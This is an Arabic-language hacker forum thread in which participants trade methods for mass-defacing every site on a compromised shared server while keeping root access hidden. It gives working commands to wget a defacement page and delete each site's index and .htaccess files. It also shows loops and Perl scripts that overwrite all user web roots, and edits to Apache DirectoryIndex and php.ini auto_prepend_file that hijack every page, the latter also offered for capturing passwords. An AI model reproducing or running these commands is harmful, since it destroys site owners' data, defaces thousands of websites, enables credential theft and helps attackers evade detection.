اسرع و اضمن طريقة لعمل الماس ديفايس لمحبى تسجيل الأختراقات

بسم الله الرحمن الرحيم

السلام عليكم و رحمة الله و بركاته

كيف الحال ان شاء الله الجميع بخير

اليوم قلت نتناقشو في فكرة جميلة و هى طريقة مضمونة لعمل الماس ديفاس راح احدد شروط :

1- السيرفر فيه العديد من المواقع نفرضها 5000 موقع eek

2-لازم المواقع كامل تسجل في الهوم يعنى site.com مش site.com/hacked.html

3-لازم الرووت يبقى معاك بعد التسجيل بدون ما تترك المجال لصاحب السيرفر انو يكتشف وجودك ddd

4-لازم محتوى المواقع يبقى سليم “الشرط هذا اعتقد راح يكشف الفكرة” :rolleyes:

الصراحة كنت بدات في شرح الطريقة من وقت و لكن لضيق الوقت لم اتمكن من اكمال الشرح و الأن قلت اعملو

موضوع للنقاش احسن :cool:.

كل واحد يعطينا مذا سيفعل في الحالة هذى ؟.

موضوع جميل في طريقة كنت استخدمها ايام الديفايس . وهية يدوية .

cd tmp  

                       wget  www.xxx.com/index.html  

rm /home/*/public_html/index.php 
rm /home/*/public_html/index.htm 
rm /home/*/public_html/index.html  

 rm /home/*/public_html/.htaccess

                      cp /tmp/index.html /home/*/public_html/index.html

طريقة ثانية


cp /tmp/index.html /home/*/www/ 
rm -rf /home/*/www/index.* 
cp /tmp/index.html /home/*/public_html/index.html 
cp -rf /tmp/index.html /home/*/public_html/index.html  

for i in `ls /home/`;do 
cp -f /tmp/index.html /home/$i/www/ 
done  

:slight_smile:

اممم واللهي ياخي نسيم انا مو من عشاق الماس اسحب روت واحتفظ بالسيرفر ممكن احتاجه في اشياء فالاندكس ماراح

يفيدني في مواقع ماتستاهل حتى التسجيل

تحياتي منتظر ردود الشباب

اهلا اخى Str0k-MaStEr :

rm /home//public_html/index.php
rm /home/
/public_html/index.htm
rm /home/*/public_html/index.html

الشرط الرابع راح :

4-لازم محتوى المواقع يبقى سليم “الشرط هذا اعتقد راح يكشف الفكرة”

اهلا خويا فوكس

انا ايضا مش من عشاق التسجيل لكن قلت نتبادلو افكار مع المهتمين.


find /home//public_html/index. >sec4ever.txt
هكذا كي نستخرج جميع المسارات الصحيحة للاندكسات على السرفر في ملف txt
وبعد ذلك نعملها على شكل سكربت برل
مثلاً

{
system("cp /tmp/index.html /home/abadi333/public_html/index.htm");
system("cp /tmp/index.html /home/accessop/public_html/index.html");
system("cp /tmp/index.html /home/admin1/public_html/index.htm");
system("cp /tmp/index.html /home/adminsa1/public_html/index.htm");
system("cp /tmp/index.html /home/ahmeng/public_html/index.html");
}

في انتظار اقترحاتكم

لكن لا بد من طريقة تسترجع الاندكسات القديمة بعد ما تسجل المواقع اذا بغيت الرووت يبقى معاك دون علم صاحب السرفر

[b]السلام عليكم

موضوع رائع الاخ نسيم و أنا شخصيا أستعمل هذه الطريقة[/b] [b]

نبحث عن مسار httpd.conf[/b] [b]

و عادة نجدها هنا /usr/local/apache/conf/httpd.conf[/b] [b]

نستخرج الدومينات و سيب دومين في ملف dmn.txt[/b]
cat /usr/local/apache/conf/httpd.conf | grep ServerName>dmn.txt [b]

نستخرج [/b]المسارات في ملف dir.txt
cat /usr/local/apache/conf/httpd.conf | grep DocumentRoot>dir.txt [b]

و بإستعمال php أرتبهم و أعمل سكريبت بيرل مثل الاخ Ma3sTr0-Dz

system(“cp /tmp/index.html /home/abadi333/public_html/index.htm”);[/b] [b]

لكن ليس /home/xxx/public_html فقط[/b] [b]

حتى مسارات subdomain[/b] [b]

و أتكل على ربي [/b] ddd

[b]أخطأت هنا أضع لك يطلع أنديكس على شكل http://www.site.com/dz.txt[/b]

system("cp [my index dir] /home/abadi333/public_html/dz.txt");

فعلاً اخي lagripe-dz عن طريق httpd.conf تستخرج كل المواقع التي تشتغل فقط على نفس السرفر

اخي اانا الطريقة الي وضعتها الهدف منها تغيير الاندكسات القديمة لجميع المواقع والتي تستخرج بالامر find مش وضع ملف subdeface

makkawi.html>403.shtml
chomd 600 /home

أهاا و أنا قصدي نخرج مسارات من httpd.conf و نعمل سكريبت بيرل

أنا ظنيتك تطلع غير هكا /home/xxx/public_html

موضوع قمة أخي نسيم وكم محتجين مثل ها الموضيع

فكرتي الجديدة كا التالي

التعديل على كونفيج الابتشي

pico /etc/httpd/conf/httpd.conf

ونبحث على هذه الكلمة

DirectoryIndex

ونحط إسم لاندكس لى عوزين يضهر لاول

مثال

DirectoryIndex raym0n.html index.html.var index.htm index.html index.shtml index.xhtml index.wml index.perl index.pl index.plx index.ppl index.cgi index.jsp index.js index.jp index.php4 index.php3 index.php index.phtml default.htm default.html home.htm index.php5 Default.html Default.htm home.html

لحض اني وضعت فى لاول raym0n.html

راح تقول ليش طيب شو الفيدة منو ؟؟

انا اقول لك

لما تفتح اي موقع

لابتيشي بيراجع البينات و الإعدادت الموجدة فى الكونفيج

وراح يلقي أمر يقول له اول صفحة تفتها هيا raym0n.html

ولو مفيش raym0n.html روح إلى index.html.var لو مفيش روح إلى …

اعتقد مفهوم

بعد تعديل الكونفيج نحفض التغير

ونعيد تشغيل خادم لابتشي

service httpd restart

بعدها نروح نكمل شغلنا

ندخل فى اي مكان فى السيرفر بصلحية الروت

ونحط لاندكس تبعنا بسم raym0n.html

ونطبق هدا لامر لى نسخ لاندكس فى جميع public_html لى اليوزيرات

find /home -name public_html -exec cp raym0n.html {} \;

ونتضر ثواني ويكون كل شئ تمام على حسب سرعة معالج ورمات السيرفر :slight_smile:

الفكرة هادي من زمان وانا شغال بيها اي شئ انا فى الخدمة

فكرة الـhttpd.conf روعة اخي ياسين ، هذه بعض المسارات لملف httpd.conf

/usr/local/etc/apache22/httpd.conf
/usr/local/etc/apache22/httpd.conf.dist
/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.1.5/examples/httpd.conf
/usr/local/lib/ruby/gems/1.8/gems/rails-2.2.2/configs/lighttpd.conf
/usr/local/lib/ruby/gems/1.8/gems/rails-app-installer-0.2.0/examples/lighttpd.co

هادا المسار هو لى لابتشي

[b]/usr/local/etc/apache22/httpd.conf

[/b]
و في سيرفرات cpanel هدا المسار الإفتراضي

[b]/etc/httpd/conf/httpd.conf

[/b]
وفي سيرفرات لاخرى بس تبحث فى etc ممكن تلقيه بسم apache او http او httpd او او

[b]خويا ياسين ممكن تستعمل الامر

locate "httpd.conf"

يظهرلك مسارته :slight_smile:
[/b]

هناك طريقة اسهل من هذي الطرق كلها
و هي عن طريق اعدادات الملف php.ini

pico /etc/php.ini

ثم نبحث عن السطر التالي

 auto_prepend_file =

نحوله الى التالي حيث هذا المسار يكون مسار الأندكس

 auto_prepend_file = /var/www/html/include_path.php

يجب ان ننهي كود الأدكس بأمر التالي

<?php
exit();
?>

ثم نعيد تشغيل httpd

httpd restart

و كل الصفحات في الموقع ستكون بالأندكس الخاص بك و في اي مكان تنفذ فيه البي اش بي :slight_smile:

صح اخي lagripe-dz

  • نسيت ان اذكر مرا الطريقة التي ذكرتها يمكن استخدامها في اقتناص كلمات السر كذالك
    لانو الملف الذي وضعنا مسارو ينفذ قبل اي ملف بي اش بي مما يعطيك تحكم كامل في جميع ما تستقبله المواقع على السرفر :slight_smile:

مشكور على الفكرة يا القط